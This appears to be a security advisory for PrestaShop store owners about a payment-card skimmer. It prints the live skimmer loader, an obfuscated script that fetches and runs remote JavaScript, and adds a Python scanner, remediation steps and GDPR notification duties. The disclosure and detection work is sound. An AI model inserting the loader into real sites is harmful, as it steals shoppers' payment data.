We have recently identified a security threat affecting certain online stores in the PrestaShop ecosystem. A malicious script ("digital skimmer") has been detected and may have resulted in the theft of some of your customers' payment information.
What does this digital skimmer do?
This malware works by replacing the legitimate payment buttons on the order page with fraudulent buttons. When a customer clicks on one of these fake buttons, they are redirected to a counterfeit payment form designed to capture their payment information.
The skimmer is simply loaded via a <script> tag, written directly in the _partials/head.tpl file of the store’s active theme. This means the attacker was able to modify a file in the store.
How do I check if my store is affected?
In the Front Office
You can check your front office code by inspecting a page on your site (right-click, then "inspect"). Look through the <script> tags; if you find the following code, your store is impacted:
<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
Note: The part aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz changes each time, but the structure of the code remains the same, and the atob() function is always used. Other code may be present before or after this snippet (the skimmer tries to hide itself by being slightly different on each store).
On Your Server
To check your files:
1. You can find the same script tag in a file on your server. Connect to your server via FTP, then navigate to the theme folder, then the active theme folder > template folder > _partials > head.tpl. On this file, right-click, then "view/edit", and look for the same tag:
<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
2. Also in your files, if you find the "mloader" or "simplefilemanager" module under the "/modules/" folder, this also means your store is impacted.
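The two server-side checks above can be run in one pass. The following Python script is an added example, not PrestaShop's own tooling: it matches the structure of the loader rather than the literal base64 string, since that part changes per store, and it reports the decoded address. The directory layout themes/<theme>/templates/_partials/head.tpl and the function names are assumptions of this example.

```python
import base64
import re
import sys
from pathlib import Path

# Shape described in the advisory: an XMLHttpRequest whose URL is hidden in
# atob('<base64>') and whose response is run with Function(...). The base64
# value differs per store, so match the structure, not the literal string.
LOADER_RE = re.compile(
    r"""XMLHttpRequest.{0,200}?atob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)"""
    r""".{0,400}?Function\(\s*\w+\.responseText\s*\)""",
    re.DOTALL,
)
SUSPECT_MODULES = ("mloader", "simplefilemanager")  # module names from the advisory


def scan_template(text):
    """Return the decoded atob() argument of every loader-shaped snippet."""
    hits = []
    for m in LOADER_RE.finditer(text):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # malformed base64: still report the raw value
            decoded = "<undecodable: %s>" % m.group(1)
        hits.append(decoded)
    return hits


def scan_shop(root):
    """Check every theme's head.tpl and the modules folder under `root`."""
    root = Path(root)
    findings = []
    # Assumed layout: themes/<theme>/templates/_partials/head.tpl
    for tpl in sorted(root.glob("themes/*/templates/_partials/head.tpl")):
        text = tpl.read_text(encoding="utf-8", errors="replace")
        for url in scan_template(text):
            findings.append(("skimmer-loader", str(tpl.relative_to(root)), url))
    for name in SUSPECT_MODULES:
        if (root / "modules" / name).is_dir():
            findings.append(("suspect-module", "modules/" + name, ""))
    return findings


if __name__ == "__main__":
    for kind, where, detail in scan_shop(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(kind, where, detail, sep="\t")
```

Run it against a downloaded copy of the store root, passing that directory as the argument. An empty result only means these two indicators are absent from the files scanned.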
What should I do if my store is affected?
- Change the passwords for your various accesses (back office, database, FTP, SSH, and don’t forget to update the database access in the PrestaShop config file).
- Check your logs to see if any of your customers' data has been exfiltrated. If so, you will need to file a complaint with law enforcement and contact the CNIL.
- Consult an IT security professional to have your entire site checked. Only a professional can guarantee the security of your store.
Do I need to notify my customers?
As data controllers under the GDPR, you are responsible for assessing whether a data breach has occurred and, if so, for carrying out the required notifications. In accordance with Articles 33 and 34 of the GDPR, any breach likely to result in a risk to rights and freedoms must be reported to the CNIL within 72 hours, and to the affected individuals in case of high risk (a practical guide is available on the CNIL website).
⚠️ At this stage, we strongly recommend you perform a complete security check of your PrestaShop stores and ensure that none of them have been compromised.